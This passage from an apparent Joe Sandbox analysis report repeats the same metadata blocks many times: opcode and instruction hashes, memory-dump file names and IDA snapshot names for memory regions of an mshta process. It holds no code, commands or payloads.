                                                                                                                                                                                                                                • Opcode ID: 576b9f8c0dd8bff1bcc4e597ee5cf6482f86a31bae9b8e5cd7b7326b59484cdb
                                                                                                                                                                                                                                • Instruction ID: ccdd705a1751dbfcfdf8635642471ee008eeb26c83f45d99dbc45e410d90b227
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 576b9f8c0dd8bff1bcc4e597ee5cf6482f86a31bae9b8e5cd7b7326b59484cdb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2626873918.0000000006810000.00000010.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6810000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 576b9f8c0dd8bff1bcc4e597ee5cf6482f86a31bae9b8e5cd7b7326b59484cdb
                                                                                                                                                                                                                                • Instruction ID: ccdd705a1751dbfcfdf8635642471ee008eeb26c83f45d99dbc45e410d90b227
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 576b9f8c0dd8bff1bcc4e597ee5cf6482f86a31bae9b8e5cd7b7326b59484cdb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2626873918.0000000006810000.00000010.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6810000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 576b9f8c0dd8bff1bcc4e597ee5cf6482f86a31bae9b8e5cd7b7326b59484cdb
                                                                                                                                                                                                                                • Instruction ID: ccdd705a1751dbfcfdf8635642471ee008eeb26c83f45d99dbc45e410d90b227
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 576b9f8c0dd8bff1bcc4e597ee5cf6482f86a31bae9b8e5cd7b7326b59484cdb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2626873918.0000000006810000.00000010.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6810000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 576b9f8c0dd8bff1bcc4e597ee5cf6482f86a31bae9b8e5cd7b7326b59484cdb
                                                                                                                                                                                                                                • Instruction ID: ccdd705a1751dbfcfdf8635642471ee008eeb26c83f45d99dbc45e410d90b227
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 576b9f8c0dd8bff1bcc4e597ee5cf6482f86a31bae9b8e5cd7b7326b59484cdb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2626873918.0000000006810000.00000010.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6810000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 576b9f8c0dd8bff1bcc4e597ee5cf6482f86a31bae9b8e5cd7b7326b59484cdb
                                                                                                                                                                                                                                • Instruction ID: ccdd705a1751dbfcfdf8635642471ee008eeb26c83f45d99dbc45e410d90b227
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 576b9f8c0dd8bff1bcc4e597ee5cf6482f86a31bae9b8e5cd7b7326b59484cdb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2626873918.0000000006810000.00000010.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6810000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 576b9f8c0dd8bff1bcc4e597ee5cf6482f86a31bae9b8e5cd7b7326b59484cdb
                                                                                                                                                                                                                                • Instruction ID: ccdd705a1751dbfcfdf8635642471ee008eeb26c83f45d99dbc45e410d90b227
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 576b9f8c0dd8bff1bcc4e597ee5cf6482f86a31bae9b8e5cd7b7326b59484cdb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2626873918.0000000006810000.00000010.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6810000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 576b9f8c0dd8bff1bcc4e597ee5cf6482f86a31bae9b8e5cd7b7326b59484cdb
                                                                                                                                                                                                                                • Instruction ID: ccdd705a1751dbfcfdf8635642471ee008eeb26c83f45d99dbc45e410d90b227
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 576b9f8c0dd8bff1bcc4e597ee5cf6482f86a31bae9b8e5cd7b7326b59484cdb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2626873918.0000000006810000.00000010.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6810000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 576b9f8c0dd8bff1bcc4e597ee5cf6482f86a31bae9b8e5cd7b7326b59484cdb
                                                                                                                                                                                                                                • Instruction ID: ccdd705a1751dbfcfdf8635642471ee008eeb26c83f45d99dbc45e410d90b227
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 576b9f8c0dd8bff1bcc4e597ee5cf6482f86a31bae9b8e5cd7b7326b59484cdb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2626873918.0000000006810000.00000010.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6810000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 576b9f8c0dd8bff1bcc4e597ee5cf6482f86a31bae9b8e5cd7b7326b59484cdb
                                                                                                                                                                                                                                • Instruction ID: ccdd705a1751dbfcfdf8635642471ee008eeb26c83f45d99dbc45e410d90b227
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 576b9f8c0dd8bff1bcc4e597ee5cf6482f86a31bae9b8e5cd7b7326b59484cdb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2626873918.0000000006810000.00000010.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6810000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 576b9f8c0dd8bff1bcc4e597ee5cf6482f86a31bae9b8e5cd7b7326b59484cdb
                                                                                                                                                                                                                                • Instruction ID: ccdd705a1751dbfcfdf8635642471ee008eeb26c83f45d99dbc45e410d90b227
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 576b9f8c0dd8bff1bcc4e597ee5cf6482f86a31bae9b8e5cd7b7326b59484cdb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2626873918.0000000006810000.00000010.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6810000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 576b9f8c0dd8bff1bcc4e597ee5cf6482f86a31bae9b8e5cd7b7326b59484cdb
                                                                                                                                                                                                                                • Instruction ID: ccdd705a1751dbfcfdf8635642471ee008eeb26c83f45d99dbc45e410d90b227
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 576b9f8c0dd8bff1bcc4e597ee5cf6482f86a31bae9b8e5cd7b7326b59484cdb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2626873918.0000000006810000.00000010.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6810000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 576b9f8c0dd8bff1bcc4e597ee5cf6482f86a31bae9b8e5cd7b7326b59484cdb
                                                                                                                                                                                                                                • Instruction ID: ccdd705a1751dbfcfdf8635642471ee008eeb26c83f45d99dbc45e410d90b227
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 576b9f8c0dd8bff1bcc4e597ee5cf6482f86a31bae9b8e5cd7b7326b59484cdb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2626873918.0000000006810000.00000010.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6810000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 576b9f8c0dd8bff1bcc4e597ee5cf6482f86a31bae9b8e5cd7b7326b59484cdb
                                                                                                                                                                                                                                • Instruction ID: ccdd705a1751dbfcfdf8635642471ee008eeb26c83f45d99dbc45e410d90b227
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 576b9f8c0dd8bff1bcc4e597ee5cf6482f86a31bae9b8e5cd7b7326b59484cdb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2626873918.0000000006810000.00000010.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6810000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 576b9f8c0dd8bff1bcc4e597ee5cf6482f86a31bae9b8e5cd7b7326b59484cdb
                                                                                                                                                                                                                                • Instruction ID: ccdd705a1751dbfcfdf8635642471ee008eeb26c83f45d99dbc45e410d90b227
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 576b9f8c0dd8bff1bcc4e597ee5cf6482f86a31bae9b8e5cd7b7326b59484cdb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2626873918.0000000006810000.00000010.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6810000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 576b9f8c0dd8bff1bcc4e597ee5cf6482f86a31bae9b8e5cd7b7326b59484cdb
                                                                                                                                                                                                                                • Instruction ID: ccdd705a1751dbfcfdf8635642471ee008eeb26c83f45d99dbc45e410d90b227
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 576b9f8c0dd8bff1bcc4e597ee5cf6482f86a31bae9b8e5cd7b7326b59484cdb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2626873918.0000000006810000.00000010.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6810000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 576b9f8c0dd8bff1bcc4e597ee5cf6482f86a31bae9b8e5cd7b7326b59484cdb
                                                                                                                                                                                                                                • Instruction ID: ccdd705a1751dbfcfdf8635642471ee008eeb26c83f45d99dbc45e410d90b227
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 576b9f8c0dd8bff1bcc4e597ee5cf6482f86a31bae9b8e5cd7b7326b59484cdb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2626873918.0000000006810000.00000010.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6810000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 576b9f8c0dd8bff1bcc4e597ee5cf6482f86a31bae9b8e5cd7b7326b59484cdb
                                                                                                                                                                                                                                • Instruction ID: ccdd705a1751dbfcfdf8635642471ee008eeb26c83f45d99dbc45e410d90b227
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 576b9f8c0dd8bff1bcc4e597ee5cf6482f86a31bae9b8e5cd7b7326b59484cdb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2626873918.0000000006810000.00000010.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6810000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 576b9f8c0dd8bff1bcc4e597ee5cf6482f86a31bae9b8e5cd7b7326b59484cdb
                                                                                                                                                                                                                                • Instruction ID: ccdd705a1751dbfcfdf8635642471ee008eeb26c83f45d99dbc45e410d90b227
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 576b9f8c0dd8bff1bcc4e597ee5cf6482f86a31bae9b8e5cd7b7326b59484cdb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2626873918.0000000006810000.00000010.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6810000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 576b9f8c0dd8bff1bcc4e597ee5cf6482f86a31bae9b8e5cd7b7326b59484cdb
                                                                                                                                                                                                                                • Instruction ID: ccdd705a1751dbfcfdf8635642471ee008eeb26c83f45d99dbc45e410d90b227
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 576b9f8c0dd8bff1bcc4e597ee5cf6482f86a31bae9b8e5cd7b7326b59484cdb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2626873918.0000000006810000.00000010.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6810000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 576b9f8c0dd8bff1bcc4e597ee5cf6482f86a31bae9b8e5cd7b7326b59484cdb
                                                                                                                                                                                                                                • Instruction ID: ccdd705a1751dbfcfdf8635642471ee008eeb26c83f45d99dbc45e410d90b227
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 576b9f8c0dd8bff1bcc4e597ee5cf6482f86a31bae9b8e5cd7b7326b59484cdb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2626873918.0000000006810000.00000010.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6810000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 576b9f8c0dd8bff1bcc4e597ee5cf6482f86a31bae9b8e5cd7b7326b59484cdb
                                                                                                                                                                                                                                • Instruction ID: ccdd705a1751dbfcfdf8635642471ee008eeb26c83f45d99dbc45e410d90b227
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 576b9f8c0dd8bff1bcc4e597ee5cf6482f86a31bae9b8e5cd7b7326b59484cdb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2626873918.0000000006810000.00000010.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6810000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 576b9f8c0dd8bff1bcc4e597ee5cf6482f86a31bae9b8e5cd7b7326b59484cdb
                                                                                                                                                                                                                                • Instruction ID: ccdd705a1751dbfcfdf8635642471ee008eeb26c83f45d99dbc45e410d90b227
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 576b9f8c0dd8bff1bcc4e597ee5cf6482f86a31bae9b8e5cd7b7326b59484cdb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2626873918.0000000006810000.00000010.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_6810000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 576b9f8c0dd8bff1bcc4e597ee5cf6482f86a31bae9b8e5cd7b7326b59484cdb
                                                                                                                                                                                                                                • Instruction ID: ccdd705a1751dbfcfdf8635642471ee008eeb26c83f45d99dbc45e410d90b227
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 576b9f8c0dd8bff1bcc4e597ee5cf6482f86a31bae9b8e5cd7b7326b59484cdb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2611872707.00000000098F0000.00000010.00000800.00020000.00000000.sdmp, Offset: 098F0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_98f0000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                                                                                                                                                • Instruction ID: 76416ff2461328da83e56b30f0825d1d7cfcb1d8c30a001fc9e5bae85e04cfe0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000003.2611872707.00000000098F0000.00000010.00000800.00020000.00000000.sdmp, Offset: 098F0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_3_98f0000_mshta.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                                                                                                                                                • Instruction ID: 76416ff2461328da83e56b30f0825d1d7cfcb1d8c30a001fc9e5bae85e04cfe0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: